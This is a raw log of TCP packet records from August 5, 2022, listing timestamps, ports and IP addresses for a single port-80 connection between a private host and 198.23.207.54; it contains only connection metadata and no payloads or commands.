Aug 5, 2022 16:36:15.766036987 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766074896 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766091108 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766109943 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766128063 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766146898 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766165018 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766185045 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766199112 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766222954 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766233921 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766263008 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766274929 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766299009 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766316891 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766331911 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766336918 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766375065 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766390085 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766411066 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766422987 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766448021 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766467094 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766480923 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766484976 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766524076 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766539097 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766561985 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766571999 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766597986 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766613960 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766635895 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766645908 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766688108 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766717911 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766724110 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766731024 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766761065 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766774893 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766798973 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766812086 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766834974 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766849995 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766872883 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766887903 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766910076 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766926050 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766947031 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766958952 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766988993 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766999960 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767024994 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767040968 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767064095 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767075062 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767101049 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767117023 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767137051 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767148972 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767174959 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767185926 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767211914 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767226934 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767252922 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767271996 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767292976 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767328978 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767338991 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767376900 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767384052 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767391920 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767431021 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767443895 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767468929 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767478943 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767504930 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767518997 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767565012 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767601967 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767608881 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767626047 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767640114 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767652035 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767678976 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767693996 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767714977 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767729044 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767754078 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767762899 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767791986 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767805099 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767827988 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767841101 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767864943 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767878056 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767901897 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767916918 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767940044 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.767952919 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.767995119 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.779617071 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.779669046 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.779706001 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.779742002 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.779777050 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.779788971 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.779813051 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.779824972 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.779830933 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.779835939 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.779839993 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.779890060 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.780213118 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.780283928 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.780286074 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.780322075 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.780358076 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.780389071 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.780390978 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.780457973 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.780481100 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.780538082 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.780544043 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.780601025 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.780602932 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.780658960 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.780661106 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.780718088 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.780720949 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.780780077 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.780781031 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.780838013 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.780839920 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.780899048 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.780900002 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.780965090 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.780966043 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781033039 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781037092 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781070948 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781102896 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781120062 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781130075 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781178951 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781186104 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781241894 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781244993 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781315088 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781322002 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781387091 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781388998 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781455040 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781469107 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781531096 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781538963 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781594038 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781608105 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781644106 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781675100 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781678915 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781713009 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781714916 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781743050 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781748056 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781764984 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781783104 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781811953 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781817913 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781833887 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781855106 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781884909 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781888008 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781905890 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781923056 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781944036 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781959057 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.781968117 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.781992912 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782025099 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782027960 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782042027 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782063007 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782095909 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782098055 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782114029 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782134056 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782146931 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782169104 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782174110 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782203913 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782222986 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782238007 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782253027 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782270908 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782273054 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782305956 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782324076 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782340050 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782355070 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782373905 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782385111 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782411098 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782443047 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782444000 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782459974 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782478094 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782493114 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782511950 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782522917 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782546043 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782567024 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782579899 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782591105 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782613039 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782622099 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782648087 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782666922 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782684088 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782697916 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782717943 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782722950 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782752991 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782772064 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782788038 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782804012 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782820940 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782833099 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782855034 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782859087 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782888889 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782919884 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782923937 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782941103 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.782962084 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782995939 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.782994986 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783010006 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783030987 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783061981 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783065081 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783080101 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783098936 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783128023 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783133030 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783157110 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783168077 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783200979 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783201933 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783237934 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783238888 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783272028 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783272982 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783288956 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783308029 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783339977 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783341885 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783360004 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783397913 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783404112 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783433914 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783464909 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783468962 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783480883 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783503056 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783531904 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783536911 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783571005 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783571959 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783605099 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783606052 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783634901 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783639908 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783654928 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783674955 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783705950 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783709049 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783724070 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783745050 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783775091 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783777952 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783808947 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783813000 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783826113 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783849001 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783871889 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783881903 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783902884 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783915997 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783950090 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.783972979 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.783977985 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.784013987 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.784029007 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.784035921 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.784039974 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.784045935 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.784075022 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.784081936 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.784106016 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.784116983 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.784151077 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.784152985 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.784173965 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.784188032 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.784214020 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.784220934 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.784250021 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.784255028 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.784285069 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.784290075 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.784313917 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.784322977 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.784348965 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.784357071 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.784384012 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.784390926 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.784424067 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.784434080 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.784467936 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.784496069 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.882821083 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.882886887 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.882917881 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.882953882 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.882980108 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883007050 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883035898 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883053064 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883080006 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883105040 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883121967 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883141041 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883155107 CEST	80	49175	198.23.207.54	192.168.2.22
